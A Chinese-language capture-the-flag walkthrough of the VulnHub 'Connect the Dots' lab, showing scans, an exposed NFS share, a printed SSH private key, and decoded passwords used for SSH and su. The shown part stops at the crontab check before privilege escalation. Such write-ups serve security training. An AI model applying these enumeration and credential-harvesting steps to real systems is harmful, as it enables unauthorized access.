CONNECT THE DOTS: 1

35 篇文章 0 订阅
30 篇文章 1 订阅

CONNECT THE DOTS: 1

https://www.vulnhub.com/entry/connect-the-dots-1,384/
在这里插入图片描述

主机发现

# yunki @ yunki in ~ [15:05:26] 
$ nmap -sn 192.168.54.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 15:05 CST
Nmap scan report for 192.168.54.2
Host is up (0.0011s latency).
Nmap scan report for 192.168.54.6
Host is up (0.0015s latency).
Nmap scan report for 192.168.54.128
Host is up (0.00084s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.61 seconds

nmap 扫描

# yunki @ yunki in ~/vulnhub/ConnectTheDots [16:13:26] 
$ sudo nmap --min-rate 10000 -p- 192.168.54.6                                   
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 16:14 CST
Nmap scan report for 192.168.54.6
Host is up (0.00011s latency).
Not shown: 65526 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
111/tcp   open  rpcbind
2049/tcp  open  nfs
7822/tcp  open  unknown
33715/tcp open  unknown
40457/tcp open  unknown
43055/tcp open  unknown
47205/tcp open  unknown
MAC Address: 00:0C:29:68:65:C7 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.51 seconds


# yunki @ yunki in ~ [15:05:42] 
$ sudo nmap -sT -sV -sC -O -p22,80,111,2049,7822,36027,42525,59157,59649 192.168.54.6 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 15:06 CST
Nmap scan report for 192.168.54.6
Host is up (0.00044s latency).

PORT      STATE  SERVICE  VERSION
22/tcp    closed ssh
80/tcp    open   http     Apache httpd 2.4.38 ((Debian))
|_http-title: Landing Page
|_http-server-header: Apache/2.4.38 (Debian)
111/tcp   open   rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      34251/tcp6  mountd
|   100005  1,2,3      36027/tcp   mountd
|   100005  1,2,3      36225/udp   mountd
|   100005  1,2,3      44552/udp6  mountd
|   100021  1,3,4      42525/tcp   nlockmgr
|   100021  1,3,4      42593/tcp6  nlockmgr
|   100021  1,3,4      44959/udp6  nlockmgr
|   100021  1,3,4      57001/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open   nfs_acl  3 (RPC #100227)
7822/tcp  open   ssh      OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 384fe876b4b704650976dd234eb569ed (RSA)
|   256 acd2a60f4b4177df06f011d592399feb (ECDSA)
|_  256 93f7786fcce8d48d754bc2bc134bf0dd (ED25519)
36027/tcp open   mountd   1-3 (RPC #100005)
42525/tcp open   nlockmgr 1-4 (RPC #100021)
59157/tcp open   mountd   1-3 (RPC #100005)
59649/tcp open   mountd   1-3 (RPC #100005)
MAC Address: 00:0C:29:68:65:C7 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.33 seconds

# yunki @ yunki in ~ [15:06:31] 
$ sudo nmap -sU -p22,80,111,2049,7822,36027,42525,59157,59649 192.168.54.6 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 15:06 CST
Nmap scan report for 192.168.54.6
Host is up (0.00025s latency).

PORT      STATE  SERVICE
22/udp    closed ssh
80/udp    closed http
111/udp   open   rpcbind
2049/udp  open   nfs
7822/udp  closed unknown
36027/udp closed unknown
42525/udp closed unknown
59157/udp closed unknown
59649/udp closed unknown
MAC Address: 00:0C:29:68:65:C7 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.36 seconds

# yunki @ yunki in ~ [15:06:59] 
$ sudo nmap -sC -p22,80,111,2049,7822,36027,42525,59157,59649 192.168.54.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 15:07 CST
Nmap scan report for 192.168.54.6
Host is up (0.00042s latency).

PORT      STATE  SERVICE
22/tcp    closed ssh
80/tcp    open   http
|_http-title: Landing Page
111/tcp   open   rpcbind
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      34251/tcp6  mountd
|   100005  1,2,3      36027/tcp   mountd
|   100005  1,2,3      36225/udp   mountd
|   100005  1,2,3      44552/udp6  mountd
|   100021  1,3,4      42525/tcp   nlockmgr
|   100021  1,3,4      42593/tcp6  nlockmgr
|   100021  1,3,4      44959/udp6  nlockmgr
|   100021  1,3,4      57001/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open   nfs_acl
7822/tcp  open   unknown
36027/tcp open   mountd
42525/tcp open   nlockmgr
59157/tcp open   unknown
59649/tcp open   unknown
MAC Address: 00:0C:29:68:65:C7 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.67 seconds
# yunki @ yunki in ~ [15:07:17] 
$ sudo nmap --script=vuln -p22,80,111,2049,7822,36027,42525,59157,59649 192.168.54.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 15:07 CST
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.54.6
Host is up (0.00030s latency).

PORT      STATE  SERVICE
22/tcp    closed ssh
80/tcp    open   http
| http-fileupload-exploiter: 
|   
|     Couldn't find a file-type field.
|   
|     Couldn't find a file-type field.
|   
|_    Couldn't find a file-type field.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_  /manual/: Potentially interesting folder
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.54.6:80/mysite/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=D%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=S%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=M%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
|_    http://192.168.54.6:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
111/tcp   open   rpcbind
2049/tcp  open   nfs
7822/tcp  open   unknown
36027/tcp open   unknown
42525/tcp open   unknown
59157/tcp open   unknown
59649/tcp open   unknown
MAC Address: 00:0C:29:68:65:C7 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 55.96 seconds

21 ftp

# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:12:42] 
$ ftp 192.168.54.6   
Connected to 192.168.54.6.
220 Welcome to Heaven!
Name (192.168.54.6:yunki): anonymous
530 Permission denied.
Login failed.

2049 nfs

ki @ yunki in ~/vulnhub/ConnectTheDots [15:30:24] 
$ showmount -e 192.168.54.6                     
Export list for 192.168.54.6:
/home/morris *

# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:30:27] 
$ mkdir mo

# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:30:30] 
$ sudo mount -t nfs 192.168.54.6:/home/morris mo

# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:30:58] 
$ ls mo             
Templates

# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:31:00] 
$ ls -liah mo/Templates 
总计 8.0K
179081 drwxr-xr-x 2 yunki yunki 4.0K 2019年10月11日 .
131648 drwxr-xr-x 8 yunki yunki 4.0K 2019年10月11日 ..

# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:31:09] 
$ ls -liah mo          
总计 56K
 131648 drwxr-xr-x  8 yunki yunki 4.0K 2019年10月11日 .
1312116 drwxr-xr-x  3 yunki yunki 4.0K  3月29日 15:30 ..
 179003 -rw-------  1 yunki yunki    1 2019年10月11日 .bash_history
 134179 -rw-r--r--  1 yunki yunki  220 2019年10月11日 .bash_logout
 134178 -rw-r--r--  1 yunki yunki 3.5K 2019年10月11日 .bashrc
 179000 drwx------  9 yunki yunki 4.0K 2019年10月11日 .cache
 179011 drwx------ 10 yunki yunki 4.0K 2019年10月11日 .config
 178998 drwx------  3 yunki yunki 4.0K 2019年10月11日 .gnupg
 179012 -rw-------  1 yunki yunki 1.9K 2019年10月11日 .ICEauthority
 179032 drwx------  3 yunki yunki 4.0K 2019年10月11日 .local
 134182 -rw-r--r--  1 yunki yunki  807 2019年10月11日 .profile
 179139 drwx------  2 yunki yunki 4.0K 2019年10月11日 .ssh
 179081 drwxr-xr-x  2 yunki yunki 4.0K 2019年10月11日 Templates
 179097 -rw-------  1 yunki yunki   52 2019年10月11日 .Xauthority

# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:31:56] 
$ cd mo                                                                                                       

# yunki @ yunki in ~/vulnhub/ConnectTheDots/mo [15:32:16] 
$ ls -liah                                                                                                    
总计 56K
 131648 drwxr-xr-x  8 yunki yunki 4.0K 2019年10月11日 .
1312116 drwxr-xr-x  3 yunki yunki 4.0K  3月29日 15:30 ..
 179003 -rw-------  1 yunki yunki    1 2019年10月11日 .bash_history
 134179 -rw-r--r--  1 yunki yunki  220 2019年10月11日 .bash_logout
 134178 -rw-r--r--  1 yunki yunki 3.5K 2019年10月11日 .bashrc
 179000 drwx------  9 yunki yunki 4.0K 2019年10月11日 .cache
 179011 drwx------ 10 yunki yunki 4.0K 2019年10月11日 .config
 178998 drwx------  3 yunki yunki 4.0K 2019年10月11日 .gnupg
 179012 -rw-------  1 yunki yunki 1.9K 2019年10月11日 .ICEauthority
 179032 drwx------  3 yunki yunki 4.0K 2019年10月11日 .local
 134182 -rw-r--r--  1 yunki yunki  807 2019年10月11日 .profile
 179139 drwx------  2 yunki yunki 4.0K 2019年10月11日 .ssh
 179081 drwxr-xr-x  2 yunki yunki 4.0K 2019年10月11日 Templates
 179097 -rw-------  1 yunki yunki   52 2019年10月11日 .Xauthority

通过翻阅文件夹内其他文件,只找到2个有用的文件,将他们拷贝到主目录下进行处理。

# yunki @ yunki in ~/vulnhub/ConnectTheDots/mo [15:32:34] 
$ cp .ssh/id_rsa ../     

# yunki @ yunki in ~/vulnhub/ConnectTheDots/mo [15:33:27] 
$ cp .ssh/id_rsa.pub ../

# yunki @ yunki in ~/vulnhub/ConnectTheDots/mo [15:33:36] 
$ cd ..                 

# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:55:11] 
$ cat id_rsa   
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEArk8CQ4/wfxbRkZExIsKaKudv417Wngdv0ePocrwKOhblnhr5fnb5
IAZAOXS+uO1CV8eg1E4fsZGUmr/QSjnkqWdqnFD/JTH/h/Y+SwobvxOQe3WRFAyQJvEM8C
SSCAxoVaKnclVS+JFPLzs3YCx48Y/VUbKByArrpuv0hw3UxlHEFdXxYGJWa6zXFXlmbRLn
Tej1xfCa45hnC5YlSka57bnAnv6rk+xzBznLJ2Q2srpnyivz/6fNuWb5x7Rz2s4IeNUpi2
4JbTs/ldTQWKxjT8K62YGcNpSrg1RMVvrUcuUK/bfdikuyRBNuturzXBvQ0aTQ7fYkTFgH
6Bn5aCfTXwAAA8gsPQrlLD0K5QAAAAdzc2gtcnNhAAABAQCuTwJDj/B/FtGRkTEiwpoq52
/jXtaeB2/R4+hyvAo6FuWeGvl+dvkgBkA5dL647UJXx6DUTh+xkZSav9BKOeSpZ2qcUP8l
Mf+H9j5LChu/E5B7dZEUDJAm8QzwJJIIDGhVoqdyVVL4kU8vOzdgLHjxj9VRsoHICuum6/
SHDdTGUcQV1fFgYlZrrNcVeWZtEudN6PXF8JrjmGcLliVKRrntucCe/quT7HMHOcsnZDay
umfKK/P/p825ZvnHtHPazgh41SmLbgltOz+V1NBYrGNPwrrZgZw2lKuDVExW+tRy5Qr9t9
2KS7JEE2626vNcG9DRpNDt9iRMWAfoGfloJ9NfAAAAAwEAAQAAAQB51d/POZzwOBLjnIir
sznvIzWhx3hbnPcbziF7kNPVJov4pwIc0yvupm/duSxWNgBZOr+/pZuhkhA82jXMrAqYHi
D2gebVKM1jS0rfSIF8XUBwCw0M5nsbvQE+GVG5LnL+6GICGIGWHHssmEdsgalHrzF7mTn9
iSSN1/9jJtfChdxnHYSOa6hbmjXOkQ3rCJ6xJCYOQ7Oh/KsGbOqzErKAFpv22MD1OQ9xM3
Q+bm7QeHRMyXeM03z4yhty2VnrqcJGWFzUCtod3YigXITC18XfFmJ4sy4IFvYdJ/3lD7El
1hNisOWmSs5M/FXXZXS8u+ISXaKeTbN1l7PhC9S8wSaBAAAAgF7o7I23cGWx5zBYcxTjJv
SOOkgolM/Ki9/fM/MDAcOGeN2MbY+bgyxVWLSWLPx7ZqhS3+eyCV5aerHkC7jPZfTxNjcW
hJuJ4HSEu+BsXGCOutZUCeG9C4tAlWgIKttoc9jW7sgnfus7a0bUZxhmDNWGwf/KcChh5l
p57d8SFJb/AAAAgQDjAiuzQ6hmjVuJ/lTtDQRJDQM24qutH1K93cIoit3oDyotQukaVL8A
T9Lv+bVEAWM2qClga2+I/MxFtepZi/vdHtZR7afhD8qWUDEm32wnUeBDch0KOKjojjhBEw
Ay0LCibdgQpYtR0fAVsWaJXJmgkb7wL7KMd+tLld2e3cDdXQAAAIEAxJHdrnE5UWGoBwcw
HjEqjR7QVbhiVhWM2m4p6RN5xx+x2CKnATUyQCN9iZ6w7jpgMkQXHjqm6V+pKkudgHuwBh
BvfVNWIPvu4Z3GgYIIeqJuqcAm7K/VD0vatUNd2WYTin3JwdrpwEHLKsWzM1oscc1Ec/If
uiW7R6xHrWHGK+sAAAANbW9ycmlzQHNpcnJvbQECAwQFBg==
-----END OPENSSH PRIVATE KEY-----

# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:55:13] 
$ cat id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuTwJDj/B/FtGRkTEiwpoq52/jXtaeB2/R4+hyvAo6FuWeGvl+dvkgBkA5dL647UJXx6DUTh+xkZSav9BKOeSpZ2qcUP8lMf+H9j5LChu/E5B7dZEUDJAm8QzwJJIIDGhVoqdyVVL4kU8vOzdgLHjxj9VRsoHICuum6/SHDdTGUcQV1fFgYlZrrNcVeWZtEudN6PXF8JrjmGcLliVKRrntucCe/quT7HMHOcsnZDayumfKK/P/p825ZvnHtHPazgh41SmLbgltOz+V1NBYrGNPwrrZgZw2lKuDVExW+tRy5Qr9t92KS7JEE2626vNcG9DRpNDt9iRMWAfoGfloJ9Nf morris@sirrom
# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:55:57] 
$ ssh -i id_rsa morris@192.168.54.6             
ssh: connect to host 192.168.54.6 port 22: Connection refused

失败了(!!!)重新查看nmap结果,发现ssh端口是7822 这里重新登录。


# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:55:57] 
$ ssh -i id_rsa morris@192.168.54.6 -p 7822     
ssh: connect to host 192.168.54.6 port 22: Connection refused

还是失败了 可恶!

80 http

目录爆破

# yunki @ yunki in ~ [15:08:33] 
$ gobuster dir  --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://192.168.54.6 -x php,txt,rar,zip,html --no-error
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.54.6
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              zip,html,php,txt,rar
[+] Timeout:                 10s
===============================================================
2023/03/29 15:12:23 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 292]
/images               (Status: 301) [Size: 313] [--> http://192.168.54.6/images/]
/index.html           (Status: 200) [Size: 1964]
/manual               (Status: 301) [Size: 313] [--> http://192.168.54.6/manual/]
/javascript           (Status: 301) [Size: 317] [--> http://192.168.54.6/javascript/]
/hits.txt             (Status: 200) [Size: 44]
/backups              (Status: 200) [Size: 6301]
/backups.html         (Status: 200) [Size: 325]
/mysite               (Status: 301) [Size: 313] [--> http://192.168.54.6/mysite/]
/.html                (Status: 403) [Size: 292]
/server-status        (Status: 403) [Size: 300]
Progress: 1320488 / 1323366 (99.78%)
===============================================================
2023/03/29 15:16:51 Finished
===============================================================

在mysite页面发现一个诡异的cs文件而不是css文件,这里打开,发现是jsfuck。

jsfuck

这里将文件处理一下,去掉其他字符只留下需要的6个字符,放到www.jsfuck.com下,点击run this.
在这里插入图片描述
You’re smart enough to understand me. Here’s your secret, TryToGuessThisNorris@2k19
根据提示,使用norris用户,密码使用TryToGuessThisNorris@2k19,尝试7822端口ssh登录。
成功!

获得初始shell

# yunki @ yunki in ~/vulnhub/ConnectTheDots [16:12:07] C:130
$ ssh norris@192.168.54.6 -p 7822
norris@192.168.54.6's password: 
Linux sirrom 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

###
   #     #    #     #     #####     #      ##     #####     #    #    #   ####
   #     ##   #     #       #       #     #  #      #       #    ##   #  #    #
   #     # #  #     #       #       #    #    #     #       #    # #  #  #
   #     #  # #     #       #       #    ######     #       #    #  # #  #  ###
   #     #   ##     #       #       #    #    #     #       #    #   ##  #    #
  ###    #    #     #       #       #    #    #     #       #    #    #   ####

Last login: Wed Mar 29 13:41:12 2023 from 192.168.54.128
norris@sirrom:~$ whoami
norris
norris@sirrom:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:68:65:c7 brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.6/24 brd 192.168.54.255 scope global dynamic noprefixroute ens33
       valid_lft 1502sec preferred_lft 1502sec
    inet6 fe80::20c:29ff:fe68:65c7/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
norris@sirrom:~$ ls
ftp  user.txt


norris@sirrom:~$ ls
ftp  user.txt
norris@sirrom:~$ ls -liah ftp
total 12K
131105 dr-xr-xr-x 3 nobody nogroup 4.0K Oct 11  2019 .
131091 drwxr-xr-x 5 norris norris  4.0K Mar 29 13:41 ..
179189 drwxr-xr-x 2 norris norris  4.0K Oct 11  2019 files
norris@sirrom:~$ ls -liah ftp/files
total 972K
179189 drwxr-xr-x 2 norris norris  4.0K Oct 11  2019 .
131105 dr-xr-xr-x 3 nobody nogroup 4.0K Oct 11  2019 ..
179199 -r-------- 1 norris norris  6.2K Oct 11  2019 backups.bak
179297 -r-------- 1 norris norris   39K Oct 11  2019 game.jpg.bak
179310 -r-------- 1 norris norris    29 Oct 11  2019 hits.txt.bak
179311 -r-------- 1 norris norris  911K Oct 11  2019 m.gif.bak
norris@sirrom:~$ strings backups.bak
-bash: strings: command not found

这里发现了ftp,但是无法查看内容,于是使用norris凭据,登录ftp查看内容。

21 ftp再探索

# yunki @ yunki in ~/vulnhub/ConnectTheDots [16:22:03] 
$ ftp 192.168.54.6
Connected to 192.168.54.6.
220 Welcome to Heaven!
Name (192.168.54.6:yunki): norris
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> binary
200 Switching to Binary mode.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 Oct 11  2019 files
226 Directory send OK.

ftp> cd files
250 Directory successfully changed.
ftp> prompt
Interactive mode off.

ftp> mget *.*
local: backups.bak remote: backups.bak
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for backups.bak (6301 bytes).
226 Transfer complete.
6301 bytes received in 0.00 secs (66.0341 MB/s)
local: game.jpg.bak remote: game.jpg.bak
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for game.jpg.bak (39610 bytes).
226 Transfer complete.
39610 bytes received in 0.00 secs (32.9625 MB/s)
local: hits.txt.bak remote: hits.txt.bak
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for hits.txt.bak (29 bytes).
226 Transfer complete.
29 bytes received in 0.00 secs (93.1589 kB/s)
local: m.gif.bak remote: m.gif.bak
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for m.gif.bak (932659 bytes).
226 Transfer complete.
932659 bytes received in 0.01 secs (118.4358 MB/s)
ftp>quit
# yunki @ yunki in ~/vulnhub/ConnectTheDots [16:25:17] 
$ file *.bak                                                                                                                                        
backups.bak:  ISO Media
game.jpg.bak: JPEG image data, JFIF standard 1.01, resolution (DPI), density 192x192, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=6, orientation=upper-left], comment: ".... . -.-- ....... -. --- .-. .-. .. ... --..-- ....... -.-- --- ..- .----. ...- . ....... -- .- -.. . ....... - .... .. ... ", progressive, precision 8, 712x350, components 3
hits.txt.bak: ASCII text, with no line terminators
m.gif.bak:    GIF image data, version 89a, 245 x 245

这里可以发现game.jpg.bak发现了一个comment,这里有个摩斯密码,使用strings获取完整的morse code,然后去cyberchef去解密。在这里插入图片描述

在这里插入图片描述
HEY NORRIS, YOU'VE MADE THIS FAR. FAR FAR FROM HEAVEN WANNA SEE HELL NOW? HAHA YOU SURELY MISSED ME, DIDN'T YOU? OH DAMN MY BATTERY IS ABOUT TO DIE AND I AM UNABLE TO FIND MY CHARGER SO QUICKLY LEAVING A HINT IN HERE BEFORE THIS SYSTEM SHUTS DOWN AUTOMATICALLY. I AM SAVING THE GATEWAY TO MY DUNGEON IN A 'SECRETFILE' WHICH IS PUBLICLY ACCESSIBLE.
提示SECRETFILE?还可以公开访问。
在这里插入图片描述
在这里插入图片描述
那就去搜索一下secretfile

norris@sirrom:~$ find / -iname "secretfile" -type f 2>/dev/null # -iname 忽略大小写
/var/www/html/secretfile
norris@sirrom:~$ cat /var/www/html/secretfile 
I see you're here for the password. Holy Moly! Battery is dying !! Mentioning below for reference.

Mentioning below for reference.(仅供参考) 后面居然没有了?参考什么呢?目录下还发现了一个.secretfile.swp,没有访问权限,会不会是他在捣鬼?这是web目录,所以可以使用wget下载下来看看。在这里插入图片描述
这里思考一下,什么情况下会出现swp文件。
在这里插入图片描述

# yunki @ yunki in ~/vulnhub/ConnectTheDots [16:33:46] 
$ wget http://192.168.54.6/.secretfile.swp                                                                                       
--2023-03-29 16:39:26--  http://192.168.54.6/.secretfile.swp
正在连接 192.168.54.6:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:12288 (12K)
正在保存至: “.secretfile.swp”
.secretfile.swp                        100%[=========================================================================>]  12.00K  --.-KB/s  用时 0s      
2023-03-29 16:39:26 (288 MB/s) - 已保存 “.secretfile.swp” [12288/12288])



# yunki @ yunki in ~/vulnhub/ConnectTheDots [16:39:26] 
$ cat .secretfile.swp 
b0VIM 8.1�
U3210#"! Utpadc����blehguessme090 I see you're here for the password. Holy Moly! Battery is dying !! Mentioning below for reference..%       

            
# yunki @ yunki in ~/vulnhub/ConnectTheDots [16:39:31] 
$ strings .secretfile.swp 
b0VIM 8.1
root
sirrom
/var/www/html/secretfile
U3210
#"! 
blehguessme090 
I see you're here for the password. Holy Moly! Battery is dying !! Mentioning below for reference..

上面说明了原因。那会不会就是修改这个文件过程中BATTERY IS DIE?通过strings 看到了vim的字样和一些与secretfile内容不同的信息。这里使用vim打开文件。vim -r 恢复swp文件。
在这里插入图片描述
发现了仅供参考的blehguessme090。会不会是管理员Morris的密码?尝试!

获得Morris权限

norris@sirrom:/var/www/html$ su morris
Password: 
morris@sirrom:/var/www/html$ whoami
morris
morris@sirrom:/var/www/html$ sudo -l
[sudo] password for morris: 
Sorry, user morris may not run sudo on sirrom.

提权

morris@sirrom:~$ whoami
morris


morris@sirrom:~$ id
uid=1000(morris) gid=1000(morris) groups=1000(morris),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),117(lpadmin),118(scanner)


morris@sirrom:~$ sudo -l
[sudo] password for morris: 
Sorry, user morris may not run sudo on sirrom.



morris@sirrom:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


